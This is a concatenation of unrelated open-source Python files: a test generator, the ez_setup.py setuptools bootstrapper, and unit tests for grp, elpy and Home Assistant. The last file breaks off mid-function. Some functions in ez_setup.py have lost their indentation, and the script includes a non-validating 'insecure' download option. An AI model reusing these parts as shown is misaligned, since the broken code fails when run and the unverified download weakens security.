    """Generate all test files; return the list of generated filenames."""
    filelist = []
    for index in range(_NUM_TESTS):
        # Zero-pad to two digits ("00.html", "01.html", ...), exactly as the
        # manual str()+"0" padding did.
        name = '%02d.html' % index
        filelist.append(name)
        WriteTest(name, index, index + 1)
    return filelist
def GenerateTestList(filelist):
    """Write *filelist* to 00_test_list.txt, one filename per line."""
    # BUG FIX: the original called ``file.close`` without parentheses (handle
    # never closed), shadowed the ``file`` builtin, and opened in "wb" while
    # writing str (a TypeError on Python 3).
    with open("00_test_list.txt", "w") as out:
        out.write('\n'.join(filelist))
def main(argv):
    """Entry point: generate all tests, then write the test list file."""
    GenerateTestList(GenerateTests())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
anasazi/POP-REU-Project | refs/heads/master | pkgs/tools/yasm/src/tools/python-yasm/tests/test_bytecode.py | 5 | # $Id: test_bytecode.py 1740 2007-01-21 22:01:34Z peter $
from tests import TestCase, add
from yasm import Bytecode, Expression
|
eduNEXT/edunext-platform | refs/heads/master | openedx/core/djangoapps/dark_lang/admin.py | 9 | """
Admin site bindings for dark_lang
"""
from config_models.admin import ConfigurationModelAdmin
from django.contrib import admin
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
admin.site.register(DarkLangConfig, ConfigurationModelAdmin)
|
lucychambers/lucychambers.github.io | refs/heads/master | .bundle/ruby/2.0.0/gems/pygments.rb-0.6.0/vendor/pygments-main/ez_setup.py | 165 | #!python
"""Bootstrap setuptools installation
If you want to use setuptools in your package's setup.py, just include this
file in the same directory with it, and add this to the top of your setup.py::
from ez_setup import use_setuptools
use_setuptools()
If you want to require a specific version of setuptools, set a download
mirror, or use an alternate download directory, you can do so by supplying
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import os
import shutil
import sys
import tempfile
import tarfile
import optparse
import subprocess
import platform
from distutils import log
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
DEFAULT_VERSION = "1.4.2"
DEFAULT_URL = "https://pypi.python.org/packages/source/s/setuptools/"
def _python_cmd(*args):
args = (sys.executable,) + args
return subprocess.call(args) == 0
def _check_call_py24(cmd, *args, **kwargs):
res = subprocess.call(cmd, *args, **kwargs)
class CalledProcessError(Exception):
pass
if not res == 0:
msg = "Command '%s' return non-zero exit status %d" % (cmd, res)
raise CalledProcessError(msg)
vars(subprocess).setdefault('check_call', _check_call_py24)
def _install(tarball, install_args=()):
    """Unpack *tarball* into a temp dir and run 'setup.py install' there.

    Returns 2 when the install step fails (used as the process exit
    status by main()); returns None on success. The temp dir is always
    removed, and the original working directory restored.
    """
    # extracting the tarball
    tmpdir = tempfile.mkdtemp()
    log.warn('Extracting in %s', tmpdir)
    old_wd = os.getcwd()
    try:
        os.chdir(tmpdir)
        tar = tarfile.open(tarball)
        _extractall(tar)
        tar.close()
        # going in the directory (the tarball contains one top-level dir)
        subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
        os.chdir(subdir)
        log.warn('Now working in %s', subdir)
        # installing
        log.warn('Installing Setuptools')
        if not _python_cmd('setup.py', 'install', *install_args):
            log.warn('Something went wrong during the installation.')
            log.warn('See the error message above.')
            # exitcode will be 2
            return 2
    finally:
        os.chdir(old_wd)
        shutil.rmtree(tmpdir)
def _build_egg(egg, tarball, to_dir):
    """Unpack *tarball* and build a bdist_egg from it into *to_dir*.

    Raises IOError if the expected *egg* file is missing afterwards.
    """
    # extracting the tarball
    tmpdir = tempfile.mkdtemp()
    log.warn('Extracting in %s', tmpdir)
    old_wd = os.getcwd()
    try:
        os.chdir(tmpdir)
        tar = tarfile.open(tarball)
        _extractall(tar)
        tar.close()
        # going in the directory (the tarball contains one top-level dir)
        subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
        os.chdir(subdir)
        log.warn('Now working in %s', subdir)
        # building an egg
        log.warn('Building a Setuptools egg in %s', to_dir)
        _python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
    finally:
        os.chdir(old_wd)
        shutil.rmtree(tmpdir)
    # returning the result
    log.warn(egg)
    if not os.path.exists(egg):
        raise IOError('Could not build the egg.')
def _do_download(version, download_base, to_dir, download_delay):
    """Download/build a setuptools egg if needed and import it.

    Puts the egg first on sys.path and records it in
    ``setuptools.bootstrap_install_from`` so the later install uses it.
    """
    egg = os.path.join(to_dir, 'setuptools-%s-py%d.%d.egg'
                       % (version, sys.version_info[0], sys.version_info[1]))
    if not os.path.exists(egg):
        tarball = download_setuptools(version, download_base,
                                      to_dir, download_delay)
        _build_egg(egg, tarball, to_dir)
    sys.path.insert(0, egg)
    # Remove previously-imported pkg_resources if present (see
    # https://bitbucket.org/pypa/setuptools/pull-request/7/ for details).
    if 'pkg_resources' in sys.modules:
        del sys.modules['pkg_resources']
    import setuptools
    setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
                   to_dir=os.curdir, download_delay=15):
    """Ensure setuptools >= *version* is importable, downloading if needed.

    Exits the process with status 2 when an incompatible setuptools was
    already imported (it can't be replaced in-process in that case).
    """
    # making sure we use the absolute path
    to_dir = os.path.abspath(to_dir)
    # Remember whether either module was imported *before* we touch them;
    # that decides whether a version conflict is recoverable below.
    was_imported = 'pkg_resources' in sys.modules or \
        'setuptools' in sys.modules
    try:
        import pkg_resources
    except ImportError:
        return _do_download(version, download_base, to_dir, download_delay)
    try:
        pkg_resources.require("setuptools>=" + version)
        return
    except pkg_resources.VersionConflict:
        e = sys.exc_info()[1]
        if was_imported:
            sys.stderr.write(
                "The required version of setuptools (>=%s) is not available,\n"
                "and can't be installed while this script is running. Please\n"
                "install a more recent version first, using\n"
                "'easy_install -U setuptools'."
                "\n\n(Currently using %r)\n" % (version, e.args[0]))
            sys.exit(2)
        else:
            del pkg_resources, sys.modules['pkg_resources']  # reload ok
            return _do_download(version, download_base, to_dir,
                                download_delay)
    except pkg_resources.DistributionNotFound:
        return _do_download(version, download_base, to_dir,
                            download_delay)
def _clean_check(cmd, target):
"""
Run the command to download target. If the command fails, clean up before
re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
    """
    Download the file at url to target using Powershell (which will validate
    trust). Raise an exception if the command cannot complete.
    """
    target = os.path.abspath(target)
    # NOTE(review): url/target are interpolated into the command via %r;
    # acceptable for the trusted PyPI URLs this script builds itself, but
    # not safe for arbitrary input.
    cmd = [
        'powershell',
        '-Command',
        "(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)" % vars(),
    ]
    _clean_check(cmd, target)
def has_powershell():
    """Return True when a working ``powershell`` executable is usable.

    Only meaningful on Windows; everywhere else this short-circuits to
    False without probing.
    """
    if platform.system() != 'Windows':
        return False
    cmd = ['powershell', '-Command', 'echo test']
    # Probe with a trivial command, discarding all output.
    with open(os.path.devnull, 'wb') as devnull:
        try:
            subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
        except Exception:
            # Was a bare 'except:' — Exception still covers a missing
            # binary (OSError) or non-zero exit, but no longer swallows
            # KeyboardInterrupt/SystemExit.
            return False
    return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
    # Fetch *url* to *target* via the curl CLI (which validates TLS trust).
    cmd = ['curl', url, '--silent', '--output', target]
    _clean_check(cmd, target)
def has_curl():
    """Return True when a usable ``curl`` binary is on PATH."""
    cmd = ['curl', '--version']
    # Probe with a harmless invocation, discarding all output.
    with open(os.path.devnull, 'wb') as devnull:
        try:
            subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
        except Exception:
            # Was a bare 'except:' — Exception still covers a missing
            # binary (OSError) or non-zero exit, but no longer swallows
            # KeyboardInterrupt/SystemExit.
            return False
    return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
    # Fetch *url* to *target* via the wget CLI (which validates TLS trust).
    cmd = ['wget', url, '--quiet', '--output-document', target]
    _clean_check(cmd, target)
def has_wget():
    """Return True when a usable ``wget`` binary is on PATH."""
    cmd = ['wget', '--version']
    # Probe with a harmless invocation, discarding all output.
    with open(os.path.devnull, 'wb') as devnull:
        try:
            subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
        except Exception:
            # Was a bare 'except:' — Exception still covers a missing
            # binary (OSError) or non-zero exit, but no longer swallows
            # KeyboardInterrupt/SystemExit.
            return False
    return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
    """
    Use Python to download the file, even though it cannot authenticate the
    connection.
    """
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen  # Python 2 fallback
    src = dst = None
    try:
        src = urlopen(url)
        # Read/write all in one block, so we don't create a corrupt file
        # if the download is interrupted.
        data = src.read()
        dst = open(target, "wb")
        dst.write(data)
    finally:
        if src:
            src.close()
        if dst:
            dst.close()
download_file_insecure.viable = lambda: True  # last-resort: always available
def get_best_downloader():
    """Pick the first viable download strategy, most trustworthy first."""
    downloaders = (
        download_file_powershell,
        download_file_curl,
        download_file_wget,
        download_file_insecure,
    )
    return next((dl for dl in downloaders if dl.viable()), None)
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
                        to_dir=os.curdir, delay=15,
                        downloader_factory=get_best_downloader):
    """Download setuptools from a specified location and return its filename
    `version` should be a valid setuptools version number that is available
    as an egg for download under the `download_base` URL (which should end
    with a '/'). `to_dir` is the directory where the egg will be downloaded.
    `delay` is the number of seconds to pause before an actual download
    attempt.
    ``downloader_factory`` should be a function taking no arguments and
    returning a function for downloading a URL to a target.
    """
    # making sure we use the absolute path
    to_dir = os.path.abspath(to_dir)
    tgz_name = "setuptools-%s.tar.gz" % version
    url = download_base + tgz_name
    saveto = os.path.join(to_dir, tgz_name)
    if not os.path.exists(saveto):  # Avoid repeated downloads
        log.warn("Downloading %s", url)
        downloader = downloader_factory()
        downloader(url, saveto)
    return os.path.realpath(saveto)
def _extractall(self, path=".", members=None):
    """Extract all members from the archive to the current working
    directory and set owner, modification time and permissions on
    directories afterwards. `path' specifies a different directory
    to extract to. `members' is optional and must be a subset of the
    list returned by getmembers().

    Backport of TarFile.extractall() for very old Pythons; *self* is a
    TarFile instance.
    """
    import copy
    import operator
    from tarfile import ExtractError
    directories = []
    if members is None:
        members = self
    for tarinfo in members:
        if tarinfo.isdir():
            # Extract directories with a safe mode; real perms are
            # restored after all files inside have been written.
            directories.append(tarinfo)
            tarinfo = copy.copy(tarinfo)
            tarinfo.mode = 448  # decimal for oct 0700
        self.extract(tarinfo, path)
    # Reverse sort directories (deepest first for the chmod pass below).
    if sys.version_info < (2, 4):
        def sorter(dir1, dir2):
            return cmp(dir1.name, dir2.name)  # py2-only builtin, guarded
        directories.sort(sorter)
        directories.reverse()
    else:
        directories.sort(key=operator.attrgetter('name'), reverse=True)
    # Set correct owner, mtime and filemode on directories.
    for tarinfo in directories:
        dirpath = os.path.join(path, tarinfo.name)
        try:
            self.chown(tarinfo, dirpath)
            self.utime(tarinfo, dirpath)
            self.chmod(tarinfo, dirpath)
        except ExtractError:
            e = sys.exc_info()[1]
            if self.errorlevel > 1:
                raise
            else:
                self._dbg(1, "tarfile: %s" % e)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the setuptools package
"""
install_args = []
if options.user_install:
if sys.version_info < (2, 6):
log.warn("--user requires Python 2.6 or later")
raise SystemExit(1)
install_args.append('--user')
return install_args
def _parse_args():
    """
    Parse the command line for options.

    Returns the optparse options object; positional arguments are ignored.
    """
    parser = optparse.OptionParser()
    parser.add_option(
        '--user', dest='user_install', action='store_true', default=False,
        help='install in user site package (requires Python 2.6 or later)')
    parser.add_option(
        '--download-base', dest='download_base', metavar="URL",
        default=DEFAULT_URL,
        help='alternative URL from where to download the setuptools package')
    parser.add_option(
        # store_const: the flag swaps the factory for the non-validating one
        '--insecure', dest='downloader_factory', action='store_const',
        const=lambda: download_file_insecure, default=get_best_downloader,
        help='Use internal, non-validating downloader'
    )
    options, args = parser.parse_args()
    # positional arguments are ignored
    return options
def main(version=DEFAULT_VERSION):
    """Install or upgrade setuptools and EasyInstall"""
    options = _parse_args()
    tarball = download_setuptools(download_base=options.download_base,
                                  downloader_factory=options.downloader_factory)
    return _install(tarball, _build_install_args(options))
# Script entry point: process exit status is _install()'s return value.
if __name__ == '__main__':
    sys.exit(main())
|
harmy/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/test/test_grp.py | 3 | """Test script for the grp module."""
import unittest
from test import support
grp = support.import_module('grp')
class GroupDatabaseTestCase(unittest.TestCase):
    """Exercise the C ``grp`` module against the host's group database."""
    def check_value(self, value):
        # check that a grp tuple has the entries and
        # attributes promised by the docs
        self.assertEqual(len(value), 4)
        self.assertEqual(value[0], value.gr_name)
        self.assertIsInstance(value.gr_name, str)
        self.assertEqual(value[1], value.gr_passwd)
        self.assertIsInstance(value.gr_passwd, str)
        self.assertEqual(value[2], value.gr_gid)
        self.assertIsInstance(value.gr_gid, int)
        self.assertEqual(value[3], value.gr_mem)
        self.assertIsInstance(value.gr_mem, list)
    def test_values(self):
        entries = grp.getgrall()
        for e in entries:
            self.check_value(e)
        if len(entries) > 1000:  # Huge group file (NIS?) -- skip the rest
            return
        for e in entries:
            e2 = grp.getgrgid(e.gr_gid)
            self.check_value(e2)
            self.assertEqual(e2.gr_gid, e.gr_gid)
            name = e.gr_name
            if name.startswith('+') or name.startswith('-'):
                # NIS-related entry
                continue
            e2 = grp.getgrnam(name)
            self.check_value(e2)
            # There are instances where getgrall() returns group names in
            # lowercase while getgrgid() returns proper casing.
            # Discovered on Ubuntu 5.04 (custom).
            self.assertEqual(e2.gr_name.lower(), name.lower())
    def test_errors(self):
        self.assertRaises(TypeError, grp.getgrgid)
        self.assertRaises(TypeError, grp.getgrnam)
        self.assertRaises(TypeError, grp.getgrall, 42)
        # try to get some errors
        bynames = {}
        bygids = {}
        for (n, p, g, mem) in grp.getgrall():
            if not n or n == '+':
                continue  # skip NIS entries etc.
            bynames[n] = g
            bygids[g] = n
        allnames = list(bynames.keys())
        namei = 0
        fakename = allnames[namei]
        # Mutate a real name character-by-character until it no longer
        # exists in the database, then assert the lookup fails.
        while fakename in bynames:
            chars = list(fakename)
            for i in range(len(chars)):
                if chars[i] == 'z':
                    chars[i] = 'A'
                    break
                elif chars[i] == 'Z':
                    continue
                else:
                    chars[i] = chr(ord(chars[i]) + 1)
                    break
            else:
                namei = namei + 1
                try:
                    fakename = allnames[namei]
                except IndexError:
                    # should never happen... if so, just forget it
                    break
            fakename = ''.join(chars)
        self.assertRaises(KeyError, grp.getgrnam, fakename)
        # Choose a non-existent gid.
        fakegid = 4127
        while fakegid in bygids:
            fakegid = (fakegid * 3) % 0x10000
        self.assertRaises(KeyError, grp.getgrgid, fakegid)
def test_main():
    # regrtest-style entry point: run the whole case via test.support.
    support.run_unittest(GroupDatabaseTestCase)
if __name__ == "__main__":
    test_main()
|
cpitclaudel/elpy | refs/heads/master | elpy/tests/test_server.py | 3 | # coding: utf-8
"""Tests for the elpy.server module"""
import os
import tempfile
import unittest
import mock
from elpy import rpc
from elpy import server
from elpy.tests import compat
from elpy.tests.support import BackendTestCase
import elpy.refactor
class ServerTestCase(unittest.TestCase):
    """Base class: every test gets a fresh ElpyRPCServer in self.srv."""
    def setUp(self):
        self.srv = server.ElpyRPCServer()
class BackendCallTestCase(ServerTestCase):
    """Adds a helper asserting that an RPC method delegates to the backend."""
    def assert_calls_backend(self, method):
        # The server should pipe "source" through get_source() and then
        # forward filename/transformed source/offset to the backend method.
        with mock.patch("elpy.server.get_source") as get_source:
            with mock.patch.object(self.srv, "backend") as backend:
                get_source.return_value = "transformed source"
                getattr(self.srv, method)("filename", "source", "offset")
                get_source.assert_called_with("source")
                getattr(backend, method).assert_called_with(
                    "filename", "transformed source", "offset"
                )
class TestInit(ServerTestCase):
    """Constructor behaviour."""
    def test_should_not_select_a_backend_by_default(self):
        self.assertIsNone(self.srv.backend)
class TestRPCEcho(ServerTestCase):
    """rpc_echo should round-trip its arguments unchanged."""
    def test_should_return_arguments(self):
        self.assertEqual(("hello", "world"),
                         self.srv.rpc_echo("hello", "world"))
class TestRPCInit(ServerTestCase):
    """rpc_init: stores the project root and selects/falls back on a backend."""
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_set_project_root(self, RopeBackend, JediBackend):
        self.srv.rpc_init({"project_root": "/project/root",
                           "backend": "rope"})
        self.assertEqual("/project/root", self.srv.project_root)
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_initialize_rope(self, RopeBackend, JediBackend):
        self.srv.rpc_init({"project_root": "/project/root",
                           "backend": "rope"})
        RopeBackend.assert_called_with("/project/root")
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_initialize_jedi(self, RopeBackend, JediBackend):
        self.srv.rpc_init({"project_root": "/project/root",
                           "backend": "jedi"})
        JediBackend.assert_called_with("/project/root")
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_use_rope_if_available_and_requested(
            self, RopeBackend, JediBackend):
        RopeBackend.return_value.name = "rope"
        JediBackend.return_value.name = "jedi"
        self.srv.rpc_init({"project_root": "/project/root",
                           "backend": "rope"})
        self.assertEqual("rope", self.srv.backend.name)
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_use_jedi_if_available_and_requested(
            self, RopeBackend, JediBackend):
        RopeBackend.return_value.name = "rope"
        JediBackend.return_value.name = "jedi"
        self.srv.rpc_init({"project_root": "/project/root",
                           "backend": "jedi"})
        self.assertEqual("jedi", self.srv.backend.name)
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_use_rope_if_available_and_nothing_requested(
            self, RopeBackend, JediBackend):
        RopeBackend.return_value.name = "rope"
        JediBackend.return_value.name = "jedi"
        self.srv.rpc_init({"project_root": "/project/root",
                           "backend": None})
        self.assertEqual("rope", self.srv.backend.name)
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_use_jedi_if_rope_not_available_and_nothing_requested(
            self, RopeBackend, JediBackend):
        RopeBackend.return_value.name = "rope"
        JediBackend.return_value.name = "jedi"
        # Simulate rope being uninstalled, then restore it.
        old_rope = server.ropebackend
        server.ropebackend = None
        try:
            self.srv.rpc_init({"project_root": "/project/root",
                               "backend": None})
        finally:
            server.ropebackend = old_rope
        self.assertEqual("jedi", self.srv.backend.name)
    @mock.patch("elpy.jedibackend.JediBackend")
    @mock.patch("elpy.ropebackend.RopeBackend")
    def test_should_use_none_if_nothing_available(
            self, RopeBackend, JediBackend):
        RopeBackend.return_value.name = "rope"
        JediBackend.return_value.name = "jedi"
        # Simulate neither backend being installed.
        old_rope = server.ropebackend
        old_jedi = server.jedibackend
        server.ropebackend = None
        server.jedibackend = None
        try:
            self.srv.rpc_init({"project_root": "/project/root",
                               "backend": None})
        finally:
            server.ropebackend = old_rope
            server.jedibackend = old_jedi
        self.assertIsNone(self.srv.backend)
class TestRPCGetCalltip(BackendCallTestCase):
    """rpc_get_calltip delegates to the backend; returns None without one."""
    def test_should_call_backend(self):
        self.assert_calls_backend("rpc_get_calltip")
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        self.assertIsNone(self.srv.rpc_get_calltip("filname", "source",
                                                   "offset"))
class TestRPCGetCompletions(BackendCallTestCase):
    """rpc_get_completions: delegation, sorting and de-duplication."""
    def test_should_call_backend(self):
        self.assert_calls_backend("rpc_get_completions")
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        self.assertEqual([],
                         self.srv.rpc_get_completions("filname", "source",
                                                      "offset"))
    def test_should_sort_results(self):
        with mock.patch.object(self.srv, 'backend') as backend:
            # Backend order is reversed sorted order: the server is
            # expected to sort case-insensitively with _/__ names last.
            backend.rpc_get_completions.return_value = [
                {'name': '_e'},
                {'name': '__d'},
                {'name': 'c'},
                {'name': 'B'},
                {'name': 'a'},
            ]
            expected = list(reversed(backend.rpc_get_completions.return_value))
            actual = self.srv.rpc_get_completions("filename", "source",
                                                  "offset")
            self.assertEqual(expected, actual)
    def test_should_uniquify_results(self):
        with mock.patch.object(self.srv, 'backend') as backend:
            backend.rpc_get_completions.return_value = [
                {'name': 'a'},
                {'name': 'a'},
            ]
            expected = [{'name': 'a'}]
            actual = self.srv.rpc_get_completions("filename", "source",
                                                  "offset")
            self.assertEqual(expected, actual)
class TestRPCGetCompletionDocs(ServerTestCase):
    """rpc_get_completion_docstring delegates; None without a backend."""
    def test_should_call_backend(self):
        with mock.patch.object(self.srv, "backend") as backend:
            self.srv.rpc_get_completion_docstring("completion")
            (backend.rpc_get_completion_docstring
             .assert_called_with("completion"))
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        self.assertIsNone(self.srv.rpc_get_completion_docstring("foo"))
class TestRPCGetCompletionLocation(ServerTestCase):
    """rpc_get_completion_location delegates; None without a backend."""
    def test_should_call_backend(self):
        with mock.patch.object(self.srv, "backend") as backend:
            self.srv.rpc_get_completion_location("completion")
            (backend.rpc_get_completion_location
             .assert_called_with("completion"))
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        self.assertIsNone(self.srv.rpc_get_completion_location("foo"))
class TestRPCGetDefinition(BackendCallTestCase):
    """rpc_get_definition delegates; None without a backend."""
    def test_should_call_backend(self):
        self.assert_calls_backend("rpc_get_definition")
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        self.assertIsNone(self.srv.rpc_get_definition("filname", "source",
                                                      "offset"))
class TestRPCGetDocstring(BackendCallTestCase):
    """rpc_get_docstring delegates; None without a backend."""
    def test_should_call_backend(self):
        self.assert_calls_backend("rpc_get_docstring")
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        self.assertIsNone(self.srv.rpc_get_docstring("filname", "source",
                                                     "offset"))
class TestRPCGetPydocCompletions(ServerTestCase):
    """rpc_get_pydoc_completions forwards its (optional) prefix argument."""
    @mock.patch.object(server, 'get_pydoc_completions')
    def test_should_call_pydoc_completions(self, get_pydoc_completions):
        srv = server.ElpyRPCServer()
        srv.rpc_get_pydoc_completions()
        get_pydoc_completions.assert_called_with(None)
        srv.rpc_get_pydoc_completions("foo")
        get_pydoc_completions.assert_called_with("foo")
class TestGetPydocDocumentation(ServerTestCase):
    """rpc_get_pydoc_documentation renders via pydoc and tolerates misses."""
    @mock.patch("pydoc.render_doc")
    def test_should_find_documentation(self, render_doc):
        render_doc.return_value = "expected"
        actual = self.srv.rpc_get_pydoc_documentation("open")
        render_doc.assert_called_with("open",
                                      "Elpy Pydoc Documentation for %s",
                                      False)
        self.assertEqual("expected", actual)
    def test_should_return_none_for_unknown_module(self):
        actual = self.srv.rpc_get_pydoc_documentation("frob.open")
        self.assertIsNone(actual)
    def test_should_return_valid_unicode(self):
        import json
        # json.dumps raises if the docstring is not valid unicode text.
        docstring = self.srv.rpc_get_pydoc_documentation("tarfile")
        json.dumps(docstring)
class TestRPCGetRefactorOptions(BackendTestCase):
    """rpc_get_refactor_options requires rope and proxies to Refactor."""
    @mock.patch.object(compat.builtins, '__import__')
    def test_should_fail_if_rope_is_not_available(self, import_):
        import_.side_effect = ImportError
        filename = self.project_file("foo.py", "")
        srv = server.ElpyRPCServer()
        self.assertRaises(ImportError, srv.rpc_get_refactor_options,
                          filename, 0)
    @mock.patch.object(elpy.refactor, 'Refactor')
    def test_should_initialize_and_call_refactor_object(self, Refactor):
        filename = self.project_file("foo.py", "import foo")
        srv = server.ElpyRPCServer()
        srv.project_root = self.project_root
        srv.rpc_get_refactor_options(filename, 5)
        Refactor.assert_called_with(self.project_root, filename)
        Refactor.return_value.get_refactor_options.assert_called_with(5, None)
class TestRPCRefactor(BackendTestCase):
    """rpc_refactor requires rope and forwards (optional) change args."""
    @mock.patch.object(compat.builtins, '__import__')
    def test_should_fail_if_rope_is_not_available(self, import_):
        import_.side_effect = ImportError
        filename = self.project_file("foo.py", "")
        srv = server.ElpyRPCServer()
        self.assertRaises(ImportError, srv.rpc_refactor,
                          filename, 'foo', ())
    @mock.patch.object(elpy.refactor, 'Refactor')
    def test_should_initialize_and_call_refactor_object_with_args(
            self, Refactor):
        filename = self.project_file("foo.py", "import foo")
        srv = server.ElpyRPCServer()
        srv.project_root = self.project_root
        srv.rpc_refactor(filename, 'foo', (1, 2, 3))
        Refactor.assert_called_with(self.project_root, filename)
        Refactor.return_value.get_changes.assert_called_with('foo', 1, 2, 3)
    @mock.patch.object(elpy.refactor, 'Refactor')
    def test_should_initialize_and_call_refactor_object_without_args(
            self, Refactor):
        filename = self.project_file("foo.py", "import foo")
        srv = server.ElpyRPCServer()
        srv.project_root = self.project_root
        srv.rpc_refactor(filename, 'foo', None)
        Refactor.assert_called_with(self.project_root, filename)
        Refactor.return_value.get_changes.assert_called_with('foo')
class TestRPCGetUsages(BackendCallTestCase):
    """rpc_get_usages delegates; raises rpc.Fault without a backend."""
    def test_should_call_backend(self):
        self.assert_calls_backend("rpc_get_usages")
    def test_should_handle_no_backend(self):
        self.srv.backend = None
        with self.assertRaises(rpc.Fault):
            self.assertIsNone(self.srv.rpc_get_usages("filname", "source",
                                                      "offset"))
class TestRPCImportMagic(ServerTestCase):
    """The importmagic RPC endpoints forward to self.srv.import_magic."""
    def test_should_call_importmagic(self):
        with mock.patch.object(self.srv, "import_magic") as impmagic:
            self.srv.rpc_get_import_symbols("filename", "source", "os")
            impmagic.get_import_symbols.assert_called_with("os")
            self.srv.rpc_add_import("filename", "source", "import os")
            impmagic.add_import.assert_called_with("source", "import os")
            self.srv.rpc_get_unresolved_symbols("filename", "source")
            impmagic.get_unresolved_symbols.assert_called_with("source")
            self.srv.rpc_remove_unreferenced_imports("filename", "source")
            impmagic.remove_unreferenced_imports.assert_called_with("source")
class TestGetSource(unittest.TestCase):
    """get_source: pass strings through, or read (and maybe delete) files."""
    def test_should_return_string_by_default(self):
        self.assertEqual(server.get_source("foo"),
                         "foo")
    def test_should_return_file_contents(self):
        fd, filename = tempfile.mkstemp(prefix="elpy-test-")
        self.addCleanup(os.remove, filename)
        with open(filename, "w") as f:
            f.write("file contents")
        fileobj = {'filename': filename}
        self.assertEqual(server.get_source(fileobj),
                         "file contents")
    def test_should_clean_up_tempfile(self):
        fd, filename = tempfile.mkstemp(prefix="elpy-test-")
        with open(filename, "w") as f:
            f.write("file contents")
        # delete_after_use asks get_source to remove the file itself.
        fileobj = {'filename': filename,
                   'delete_after_use': True}
        self.assertEqual(server.get_source(fileobj),
                         "file contents")
        self.assertFalse(os.path.exists(filename))
    def test_should_support_utf8(self):
        fd, filename = tempfile.mkstemp(prefix="elpy-test-")
        self.addCleanup(os.remove, filename)
        with open(filename, "wb") as f:
            f.write(u"möp".encode("utf-8"))
        source = server.get_source({'filename': filename})
        self.assertEqual(source, u"möp")
class TestPysymbolKey(BackendTestCase):
    """_pysymbol_key sort order: public < dunder < private, case-insensitive."""
    def keyLess(self, a, b):
        # Sanity check the raw ordering, then assert key(a) sorts first.
        self.assertLess(b, a)
        self.assertLess(server._pysymbol_key(a),
                        server._pysymbol_key(b))
    def test_should_be_case_insensitive(self):
        self.keyLess("bar", "Foo")
    def test_should_sort_private_symbols_after_public_symbols(self):
        self.keyLess("foo", "_bar")
    def test_should_sort_private_symbols_after_dunder_symbols(self):
        self.assertLess(server._pysymbol_key("__foo__"),
                        server._pysymbol_key("_bar"))
    def test_should_sort_dunder_symbols_after_public_symbols(self):
        self.keyLess("bar", "__foo")
|
ErykB2000/home-assistant | refs/heads/master | tests/test_component_history.py | 4 | """
tests.test_component_history
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests the history component.
"""
# pylint: disable=protected-access,too-many-public-methods
import time
import os
import unittest
import homeassistant as ha
import homeassistant.util.dt as dt_util
from homeassistant.components import history, recorder
from helpers import (
mock_http_component, mock_state_change_event, get_test_home_assistant)
class TestComponentHistory(unittest.TestCase):
    """ Tests homeassistant.components.history module. """
    def setUp(self):  # pylint: disable=invalid-name
        """ Init needed objects. """
        self.hass = get_test_home_assistant(1)
        self.init_rec = False
    def tearDown(self):  # pylint: disable=invalid-name
        """ Stop down stuff we started. """
        self.hass.stop()
        if self.init_rec:
            # Let pending recorder writes finish before removing its DB.
            recorder._INSTANCE.block_till_done()
            os.remove(self.hass.config.path(recorder.DB_FILE))
    def init_recorder(self):
        # Start the recorder component; history queries need its DB.
        recorder.setup(self.hass, {})
        self.hass.start()
        recorder._INSTANCE.block_till_done()
        self.init_rec = True
    def test_setup(self):
        """ Test setup method of history. """
        mock_http_component(self.hass)
        self.assertTrue(history.setup(self.hass, {}))
    def test_last_5_states(self):
        """ Test retrieving the last 5 states. """
        self.init_recorder()
        states = []
        entity_id = 'test.last_5_states'
        for i in range(7):
            self.hass.states.set(entity_id, "State {}".format(i))
            # Only the last 5 of the 7 states should be returned.
            if i > 1:
                states.append(self.hass.states.get(entity_id))
            self.hass.pool.block_till_done()
            recorder._INSTANCE.block_till_done()
        self.assertEqual(
            list(reversed(states)), history.last_5_states(entity_id))
    def test_get_states(self):
        """ Test getting states at a specific point in time. """
        self.init_recorder()
        states = []
        # Create 10 states for 5 different entities
        # After the first 5, sleep a second and save the time
        # history.get_states takes the latest states BEFORE point X
        for i in range(10):
            state = ha.State(
                'test.point_in_time_{}'.format(i % 5),
                "State {}".format(i),
                {'attribute_test': i})
            mock_state_change_event(self.hass, state)
            self.hass.pool.block_till_done()
            recorder._INSTANCE.block_till_done()
            if i < 5:
                states.append(state)
            if i == 4:
